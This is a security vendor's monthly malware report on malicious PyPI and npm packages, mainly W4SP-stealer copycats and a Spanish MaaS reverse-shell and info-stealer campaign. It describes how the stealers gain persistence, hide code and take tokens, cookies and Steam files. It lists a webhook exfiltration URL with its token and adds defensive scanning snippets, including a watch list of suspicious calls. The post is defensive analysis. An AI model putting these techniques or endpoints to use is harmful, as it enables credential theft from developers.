Welcome to a new issue of Malware Monthly, where we collaborate with our team of security researchers to provide an in-depth look at the different types of malware we’ve detected and how they can impact your system.
This month, we'll dive deep into a series of malicious packages uploaded to the PyPI registry and identified as information stealers, some of them copies of the popular W4SP stealer we’ve been tracking. We'll also explore a malicious package called reverse-shell that’s part of a global malware-as-a-service (MaaS) initiative, and a data leak incident at OpenAI that led to the first ban of ChatGPT by a Western country.
In terms of volume, in March we caught a total of 6,933 malicious packages.
Some of the Node packages we caught on npm, such as segment-js-sdk, product-api-ts-axios-sdk, and account-api-ts-axios-sdk, published under the scope 12build, contain lightly obfuscated code in the file build.js that exfiltrates environment variables to a “pipedream.net” address. Other packages, including ibd-ui-component-library, fortnox-react, otc-trading-desk, payments-js, f0-content-parser, and typeahead-client-logger, followed the very same pattern. On PyPI, we wanted to dive deeper into the most recent info-stealers we found: microsoft-helper and reverse-shell.
Arm yourself with the latest news and insights on the world of malware security and how you can properly protect your team’s build environment from potential risks.
Ain't no rest for the W4SP copycats
After our initial report on a series of malicious packages uploaded to the PyPI registry that we investigated and identified as info-stealer trojans, we observed a continuation of this trend throughout the month of March. These packages are copycats of the popular W4SP stealer, an ongoing risk to the open-source software supply chain.
These types of packages are a cause for concern as they pose a serious threat to developers who may inadvertently download and install them. Given the potential danger involved, we reported them to the PyPI team and they took them down promptly and proficiently. Nevertheless, we wanted to dive deeper and examine one of the malicious packages post-mortem in order to gain a better understanding of how they operate.
Armed with our gloves and surgical instruments, let’s delve deeper into the intricacies of a package called microsoft-helper and then we’ll examine its near cousin, pyezstyle, which will only appear briefly.
As is usually the case, the bad actors added a line to setup.py so that the malware is deployed as soon as developers run pip install.
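Seen from the defender's side, this kind of install-time hook can often be spotted without running anything. The following is a minimal sketch, assuming a simple name-based heuristic: the function find_suspicious_calls and the SUSPICIOUS_NAMES watch list are our own illustrative names, not part of any real scanner, and the sample setup.py uses a placeholder URL.

```python
import ast

# Hypothetical watch list: call names that deserve a closer look in setup.py.
SUSPICIOUS_NAMES = {"exec", "eval", "compile", "urlopen", "system", "Popen", "run"}


def find_suspicious_calls(source: str) -> list[tuple[int, str]]:
    """Return (line, name) pairs for calls whose name is on the watch list.

    The source is only parsed, never executed.
    """
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Plain call such as exec(...) or attribute call such as os.system(...).
        name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
        if name in SUSPICIOUS_NAMES:
            hits.append((node.lineno, name))
    return sorted(hits)


if __name__ == "__main__":
    # Illustrative setup.py with a placeholder URL, not the real payload.
    sample = (
        "from setuptools import setup\n"
        "from urllib.request import urlopen\n"
        "exec(urlopen('https://example.invalid/stage2').read())\n"
        "setup(name='demo', version='0.0.1')\n"
    )
    for line, name in find_suspicious_calls(sample):
        print(f"line {line}: call to {name}()")
```

A match is only a hint that a human should read the file. Plenty of legitimate setup.py files call subprocess.run(), and a determined attacker can hide a call behind getattr() or an import alias.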
The name of the package, microsoft-helper, might be the bad actors’ attempt to disguise its malicious nature, maybe with the goal of adding it as a dependency of a popular package they already control. However, the author’s name, made up of abbreviations, didn’t even try to pass as a legit author:
When developers inadvertently execute the payload, it fetches a remote script from the URL https[:]//paste[.]bingner[.]com/paste/rg8v8/raw, which contains the second-stage payload. At the time of this writing, that URL is still active. However, the Discord webhook (which, unlike in the other copycats we’ve analyzed, was moved to the top of the code) returns a JSON response with a “code: 10015” error message, indicating that the webhook is no longer valid.
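Because the webhook URL sits in plain text in the second-stage payload, it makes a handy indicator to search for. Here is a minimal sketch of such a search, assuming the usual shape of a Discord webhook URL. The names refang and find_webhook_ids are ours, and the URL in the sample is a made-up placeholder.

```python
import re

# Matches webhook URLs on discord.com, the legacy discordapp.com domain,
# and the canary/ptb subdomains. Group 1 is the numeric webhook ID.
WEBHOOK_RE = re.compile(
    r"https://(?:(?:canary|ptb)\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([\w-]+)"
)


def refang(text: str) -> str:
    """Undo the [:] and [.] defanging used when quoting indicators in reports."""
    return text.replace("[:]", ":").replace("[.]", ".")


def find_webhook_ids(source: str) -> list[str]:
    """Return the numeric IDs of any Discord webhook URLs found in source."""
    return [match.group(1) for match in WEBHOOK_RE.finditer(refang(source))]


if __name__ == "__main__":
    # Placeholder URL for illustration only.
    sample = 'hook = "https://discord.com/api/webhooks/123456789012345678/EXAMPLE-token_value"'
    print(find_webhook_ids(sample))
```

This only catches URLs stored as literal strings. A payload that assembles the URL at runtime, or hides it behind encoding, would need to be deobfuscated first.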
Now let’s switch to another package: the near-duplicate pyezstyle. If we compare the two second-stage payloads, the only difference is the Discord webhook URL, https[:]//discord[.]com/api/webhooks/1087680971081519124/FAYiwvOu4N_raBxx6JAs9GQHtjLBqJK6yBJXKXlHi5xJ2g3QKtxLQDqe_ccFBYULwlys. This one doesn’t return an error message, and by looking at the guild_id (Discord IDs encode their creation time), we find that the channel was created on March 21, 2023. So this is the one that’s still active.
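Dating a Discord object from its ID works because Discord IDs are “snowflakes”: the bits above the lowest 22 hold the number of milliseconds since January 1, 2015. The guild_id value itself isn’t reproduced in this post, so the sketch below decodes the numeric webhook ID from the URL instead, which is an assumption on our part about which ID to use. The helper name snowflake_created_at is ours.

```python
from datetime import datetime, timezone

DISCORD_EPOCH_MS = 1420070400000  # 2015-01-01T00:00:00Z, the epoch Discord IDs count from


def snowflake_created_at(snowflake: int) -> datetime:
    """Decode the creation time stored in the upper bits of a Discord ID."""
    # The low 22 bits hold worker, process, and sequence data; the rest is
    # milliseconds since the Discord epoch.
    timestamp_ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(timestamp_ms / 1000, tz=timezone.utc)


if __name__ == "__main__":
    webhook_id = 1087680971081519124  # numeric ID from the pyezstyle webhook URL
    print(snowflake_created_at(webhook_id).date())  # prints 2023-03-21
```

The webhook ID decodes to the same date we got from the guild_id, March 21, 2023 (UTC).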
Anyway, that’s it for pyezstyle. We told you it was only going to appear briefly, so let’s switch back to microsoft-helper.
Another thing we noticed is that the bad actors modified the second-stage payload we had initially accessed. This is a known practice: on top of making the malicious code less visible, adding a second-stage payload allows more flexibility since it’s easier to modify the code without having to redo everything from scratch.
In microsoft-helper we witnessed how the name “Fade Stealer”, itself a copycat of W4SP stealer, was modified to “EVIL$ Stealer”. A new name to add to the list of copycat info-stealers after “Satan Stealer,” “ANGEL Stealer,” “Leaf $tealer,” “@skid STEALER,” “Fade Stealer,” “Celestial Stealer,” and “Creal Stealer.” It's a copy of a copy of a copy.
Spanish squad enters the MaaS market
If you’re a software developer perusing the PyPI registry, you’d do a double take when stumbling upon a package called reverse-shell. Of course, you wouldn’t deliberately pip install something named after an attack technique — unless you're doubling as a security researcher, and in that case, we’re sure you’d be looking from within the safe confines of a virtual machine.
So why would someone name a malicious package in such a blatantly obvious way? Bad actors usually hide their intent by naming their packages after popular libraries or company names, so it was disconcerting when our security researchers found this one. No typosquatting attempt here. No dependency confusion. Maybe these bad actors are just testing the waters for something else...
And when we looked at setup.py, we found something even stranger: detailed tutorial-like comments in Spanish. “Clone GitHub repository and execute file”, “replace with URL of your GitHub repository”, “path where you want to clone the repo”, etc. It seems we were looking at either a hacking tutorial for beginners or a MaaS offering for the Spanish-speaking market.
The repository URL referenced in the code, which belongs to a user called “NotInfected”, is no longer active. But another repo associated with this code is still active as of now. We’ll reveal the name of that repo at the right time, so bear with us.
Even though the package reverse-shell doesn’t look malicious at first glance, the file that it executes from GitHub, bypass.py, and consequently, WindowsDefender.py, are nothing but nefarious.
Hosting malicious files on a public repository gives bad actors more control over them: they can delete, update, or even version-control the payload.
Such is the case of bypass.py. The code has some light obfuscation, possibly to evade static code analysis tools or just hide the malicious code from developers:
They’re encoding the script as a series of numbers that correspond to the ASCII codes of the characters in said script. These codes are then converted back to characters and joined together using the .join() method. By simply replacing the exec call with print, human-readable code is suddenly revealed:
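The same trick can be reproduced safely with a harmless string. The sketch below assumes the obfuscated line has the shape exec(''.join(map(chr, [...]))), which is our guess at the general pattern rather than a copy of bypass.py. Instead of swapping exec for print by hand, it parses the line and decodes the number list, so nothing is ever executed. The helper name decode_chr_join is ours.

```python
import ast


def decode_chr_join(obfuscated: str) -> str:
    """Recover text hidden as a list of character codes, without running it."""
    tree = ast.parse(obfuscated)
    for node in ast.walk(tree):
        # Look for the first list literal made up entirely of integer constants.
        if isinstance(node, ast.List) and node.elts and all(
            isinstance(e, ast.Constant) and isinstance(e.value, int) for e in node.elts
        ):
            return "".join(chr(e.value) for e in node.elts)
    raise ValueError("no list of character codes found")


if __name__ == "__main__":
    # Harmless stand-in for the real payload: the codes spell print('hello').
    sample = (
        "exec(''.join(map(chr, "
        "[112, 114, 105, 110, 116, 40, 39, 104, 101, 108, 108, 111, 39, 41])))"
    )
    print(decode_chr_join(sample))  # prints print('hello')
```

Parsing instead of executing matters here: an analyst who edits exec to print by hand is one missed call away from running the payload.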
The code defines the function add_to_startup as a persistence mechanism: it adds the application to the Windows Registry so that it launches automatically every time Windows starts. It also adds the file WindowsDefender.py (hosted on NotInfected’s GitHub) to the Windows startup folder, constructing the correct path for the file. Finally, it uses subprocess.run() to execute the WindowsDefender.py script.
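One quick way to check a machine for the second half of this persistence is to list any script files sitting in the Startup folder. The following is a minimal sketch under a few assumptions: the helper names and the SCRIPT_SUFFIXES list are ours, only the per-user Startup folder under %APPDATA% is covered, and the Registry autorun entries are not inspected at all.

```python
import os
from pathlib import Path

# Hypothetical list of extensions worth reviewing in a startup location.
SCRIPT_SUFFIXES = {".py", ".pyw", ".bat", ".cmd", ".vbs", ".ps1"}


def default_startup_dir() -> Path:
    """Per-user Startup folder on Windows, built from %APPDATA%."""
    appdata = os.environ.get("APPDATA", "")
    return Path(appdata) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup"


def find_startup_scripts(startup_dir: Path) -> list[str]:
    """Return the names of script files sitting directly in startup_dir."""
    if not startup_dir.is_dir():
        return []
    return sorted(
        p.name
        for p in startup_dir.iterdir()
        if p.is_file() and p.suffix.lower() in SCRIPT_SUFFIXES
    )


if __name__ == "__main__":
    for name in find_startup_scripts(default_startup_dir()):
        print(f"review startup entry: {name}")
```

A Python file named after a security product in that folder, as in this campaign, is a strong signal that something is off.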
Okay, that’d be it from bypass.py. Let’s explore WindowsDefender.py to see where it takes us.
After going through the same deobfuscation method described above, static analysis revealed the malicious nature of the Python code. The tutorial aspect is gone (no detailed comments this time), so this file is apparently not meant to be modified by the group’s MaaS clients.
What we’re dealing with here is an “info-stealer”: a piece of malware that’s designed to exfiltrate sensitive information. Here’s how it works:
The get_token() function retrieves Discord authentication tokens stored in the local storage of various web browsers and attempts to decrypt them using the master key. Other functions, including get_login_data(), get_web_history(), get_downloads(), get_cookies(), and get_credit_cards(), perform what their names suggest before sending all the information to a webhook in a Discord channel.
After grabbing data from the web browsers, the code takes a screenshot of the user's desktop using the ImageGrab.grab() function from the Python Imaging Library (PIL). The screenshot is saved to the temporary directory and uploaded to the same Discord webhook.
The code also checks if the Steam gaming platform is installed on the user's system. If so, it zips up the config directory and any SSFN files (authentication tokens) in the Steam installation directory. The zipped files are then uploaded to the Discord webhook where an attacker will have everything they need to take control of the Steam account.
As you can see, it checks all the boxes for a sophisticated info-stealer. And within the code, we also found text strings that indicate that the actor behind this might be a group called SylexSquad:
Remember that repo we mentioned earlier that’s still active? It belongs to SylexSquad. The two files we’ve just discussed are hosted there.
A bit of OSINT research reveals that this group was behind a now-defunct hacking marketplace on the Sellix platform that was active in 2022.
And like other groups that sell info-stealers, they use YouTube to promote their products with fast-paced teaser videos set to hip-hop and electronic music. In one called “DISCORD SYLEXRAT BOT”, they revealed for a quick second the URL of a MediaFire page to download the file GAutoClicker.zip. We, of course, downloaded it, but not before noticing that the file was uploaded from Spain:
The use of tutorial-style Spanish language, this piece of metadata, and prices in EUR suggest that the bad actors are from Spain.
Behind this campaign we found three Discord users, two of them with the name Syntax:
And this is where the package sintaxisoyyo makes a brief appearance. In its setup.py there’s nothing overtly malicious, just a notification sent to a Discord webhook with the message “¡Alguien ha instalado el paquete reverse_shell!” (“Someone has installed the reverse_shell package!”). Of course, this is not the reverse-shell package, so yeah, they’re just trying things out. And experiments are often messy: there was a folder in this package called “syntax” with two files, __init__.py and __main__.py. The former, with lightly obfuscated code, turned out to be the same as WindowsDefender.py. The latter, with no obfuscation, appears to be another product: a Discord bot that executes commands and performs actions on the infected machine. So this is the actual reverse shell.
The malware can retrieve cookies, take screenshots, run shell commands, steal browsing history, and send all this data to the attacker’s Discord channel. And because this is part of a MaaS offering, a picture is worth a thousand words: ASCII art is printed in the Discord channel as soon as the attackers receive a message announcing that someone has been infected.
We tracked these packages under sonatype-2023-1534 in our data and reported them to the PyPI team, which effectively took them down. We'll keep a close eye on this group's future activities and keep adding any findings to our data so you can stay protected.
ChatGPT, write a section about your latest data leak
We wanted to wrap up this issue with a mention of the data breach OpenAI recently experienced.
An unpatched bug in an open-source component, the Redis client library redis-py, led to the leakage of some subscribers’ payment-related information and users’ chat queries. OpenAI identified the root cause of the incident as a race condition in redis-py, a popular package available in the PyPI repository.
However, even after an initial fix was issued in version 4.5.3 (CVE-2023-28858), some testers were still able to reproduce the flaw, so a second identifier (CVE-2023-28859) was assigned to track the incomplete fix.
This incident, which has fueled arguments for the regulation of AI, led Italy to become the first Western country to ban ChatGPT. It also serves as a reminder to be vigilant about race condition vulnerabilities and their potential for exploitation.
Read Ax Sharma’s blog post to find out more.
Automate protection from supply chain attacks
The packages mentioned above just scratch the surface of the volume of malware caught by our tools. Since 2019, we’ve discovered a total of 115,165 packages flagged as malicious, suspicious, or proof-of-concept.
Sonatype’s system uses ML/AI techniques to recognize unusual attributes for newly published components in public repositories. Data delivered via our tooling’s near real-time detection capabilities helps prevent our customers from inadvertently consuming malicious components.
If you want to stay protected from software supply chain attacks, consider Sonatype Repository Firewall to automatically block malicious packages from reaching your development builds.
Written by Sonatype Developer Relations
As Sonatype's Developer Relations team, we empower software developers, infosec practitioners, and DevOps/SRE pros to do their best work.